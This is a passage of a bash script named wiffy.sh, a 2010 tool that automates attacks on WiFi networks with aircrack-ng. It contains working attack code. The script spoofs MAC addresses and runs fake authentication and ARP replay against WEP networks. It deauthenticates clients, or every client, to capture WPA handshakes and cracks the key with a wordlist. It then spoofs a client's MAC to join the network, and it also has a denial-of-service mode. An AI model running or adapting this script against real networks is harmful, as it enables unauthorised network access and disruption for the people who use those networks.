\"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > 